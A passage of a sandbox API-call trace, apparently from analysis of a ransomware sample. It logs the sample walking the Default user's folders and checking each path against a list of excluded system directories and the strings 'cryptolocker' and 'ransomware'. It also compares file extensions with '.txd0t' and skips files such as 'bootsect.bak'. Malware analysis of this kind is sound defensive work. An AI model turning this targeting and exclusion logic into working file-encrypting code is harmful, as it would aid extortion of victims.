psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.809] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Downloads", cchMax=1058 | out: psz1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\windows\\system32\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\windows\\system\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\appdata\\local\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\boot\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\perflogs\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\programdata\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\drivers\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\wsus\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="crypt_detect") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="cryptolocker") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="ransomware") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="C:\\WINDOWS") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.809] StrStrIW (lpFirst="C:\\Users\\Default\\Downloads", lpSrch="C:\\Program Files") returned 0x0 [0089.809] GetProcessHeap () returned 0xe30000 [0089.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec65a0 [0089.809] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\Downloads", cchMax=1078 | out: psz1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0089.809] StrNCatW (in: psz1="C:\\Users\\Default\\Downloads", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Downloads\\*") returned="C:\\Users\\Default\\Downloads\\*" [0089.809] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0089.809] StrCmpW (psz1=".", psz2=".") returned 0 [0089.809] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.810] StrCmpW (psz1="..", psz2=".") returned 1 [0089.810] StrCmpW (psz1="..", psz2="..") returned 0 [0089.810] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3f66782, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.810] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0089.810] GetProcessHeap () returned 0xe30000 [0089.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65a0 | out: hHeap=0xe30000) returned 1 [0089.810] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0089.810] StrCmpW (psz1="Favorites", psz2=".") returned 1 [0089.810] StrCmpW (psz1="Favorites", psz2="..") returned 1 [0089.810] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.810] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.810] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Favorites", cchMax=1058 | out: psz1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0089.810] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\windows\\system32\\") returned 0x0 [0089.810] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\windows\\system\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\appdata\\local\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\boot\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\perflogs\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\programdata\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\drivers\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\wsus\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="crypt_detect") returned 0x0 [0089.821] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="cryptolocker") returned 0x0 [0089.822] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="ransomware") returned 0x0 [0089.822] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="C:\\WINDOWS") returned 0x0 [0089.822] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.822] StrStrIW (lpFirst="C:\\Users\\Default\\Favorites", lpSrch="C:\\Program Files") returned 0x0 [0089.822] GetProcessHeap () returned 0xe30000 [0089.822] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec65a0 [0089.822] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\Favorites", cchMax=1078 | out: psz1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0089.822] StrNCatW (in: psz1="C:\\Users\\Default\\Favorites", psz2="\\*", cchMax=1078 | out: psz1="C:\\Users\\Default\\Favorites\\*") returned="C:\\Users\\Default\\Favorites\\*" [0089.822] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0089.822] StrCmpW (psz1=".", psz2=".") returned 0 [0089.822] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.822] StrCmpW (psz1="..", psz2=".") returned 1 [0089.822] StrCmpW (psz1="..", psz2="..") returned 0 [0089.822] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.822] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0089.822] GetProcessHeap () returned 0xe30000 [0089.822] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65a0 | out: hHeap=0xe30000) returned 1 [0089.822] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0089.822] StrCmpW (psz1="Links", psz2=".") returned 1 [0089.822] StrCmpW (psz1="Links", psz2="..") returned 1 [0089.822] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.822] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.822] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Links", cchMax=1058 | out: psz1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\windows\\system32\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\windows\\system\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\appdata\\local\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\boot\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\perflogs\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\programdata\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\drivers\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\wsus\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="crypt_detect") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="cryptolocker") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="ransomware") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="C:\\WINDOWS") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.823] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="C:\\Program Files") returned 0x0 [0089.823] GetProcessHeap () returned 0xe30000 [0089.823] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xec65a0 [0089.823] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\Links", cchMax=1070 | out: psz1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0089.823] StrNCatW (in: psz1="C:\\Users\\Default\\Links", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Default\\Links\\*") returned="C:\\Users\\Default\\Links\\*" [0089.823] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2330 [0089.823] StrCmpW (psz1=".", psz2=".") returned 0 [0089.823] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.824] StrCmpW (psz1="..", psz2=".") returned 1 [0089.824] StrCmpW (psz1="..", psz2="..") returned 0 [0089.824] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.824] FindClose (in: hFindFile=0xec2330 | out: hFindFile=0xec2330) returned 1 [0089.824] GetProcessHeap () returned 0xe30000 [0089.824] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65a0 | out: hHeap=0xe30000) returned 1 [0089.824] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0089.824] StrCmpW (psz1="Local Settings", psz2=".") returned 1 [0089.824] StrCmpW (psz1="Local Settings", psz2="..") returned 1 [0089.824] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0089.824] StrCmpW (psz1="Music", psz2=".") returned 1 [0089.824] StrCmpW (psz1="Music", psz2="..") returned 1 [0089.824] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.824] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.824] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Music", cchMax=1058 | out: psz1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\windows\\system32\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\windows\\system\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\appdata\\local\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\boot\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\perflogs\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\programdata\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\drivers\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\wsus\\") returned 0x0 [0089.824] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.825] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.825] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="crypt_detect") returned 0x0 [0089.825] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="cryptolocker") returned 0x0 [0089.825] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="ransomware") returned 0x0 [0089.825] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="C:\\WINDOWS") returned 0x0 [0089.825] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.825] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="C:\\Program Files") returned 0x0 [0089.825] GetProcessHeap () returned 0xe30000 [0089.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xec65a0 [0089.825] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\Music", cchMax=1070 | out: psz1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0089.825] StrNCatW (in: psz1="C:\\Users\\Default\\Music", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Default\\Music\\*") returned="C:\\Users\\Default\\Music\\*" [0089.825] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0089.825] StrCmpW (psz1=".", psz2=".") returned 0 [0089.825] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.825] StrCmpW (psz1="..", psz2=".") returned 1 [0089.825] StrCmpW (psz1="..", psz2="..") returned 0 [0089.825] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.825] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0089.825] GetProcessHeap () returned 0xe30000 [0089.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65a0 | out: hHeap=0xe30000) returned 1 [0089.825] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0089.825] StrCmpW (psz1="My Documents", psz2=".") returned 1 [0089.825] StrCmpW (psz1="My Documents", psz2="..") returned 1 [0089.825] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0089.825] StrCmpW (psz1="NetHood", psz2=".") returned 1 [0089.825] StrCmpW (psz1="NetHood", psz2="..") returned 1 [0089.825] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4aac40, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x19fa8eb, ftLastAccessTime.dwHighDateTime=0x1d5d811, ftLastWriteTime.dwLowDateTime=0x19fa8eb, ftLastWriteTime.dwHighDateTime=0x1d5d811, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0089.825] StrCmpW (psz1="NTUSER.DAT", psz2=".") returned 1 [0089.825] StrCmpW (psz1="NTUSER.DAT", psz2="..") returned 1 [0089.826] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.826] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.826] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="NTUSER.DAT", cchMax=1058 | out: psz1="C:\\Users\\Default\\NTUSER.DAT") returned="C:\\Users\\Default\\NTUSER.DAT" [0089.826] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0089.826] StrCmpW (psz1=".DAT", psz2=".txd0t") returned -1 [0089.826] StrCmpIW (psz1="NTUSER.DAT", psz2="bootsect.bak") returned 1 [0089.826] StrCmpIW (psz1="NTUSER.DAT", psz2="iconcache.db") returned 1 [0089.826] StrCmpIW (psz1="NTUSER.DAT", 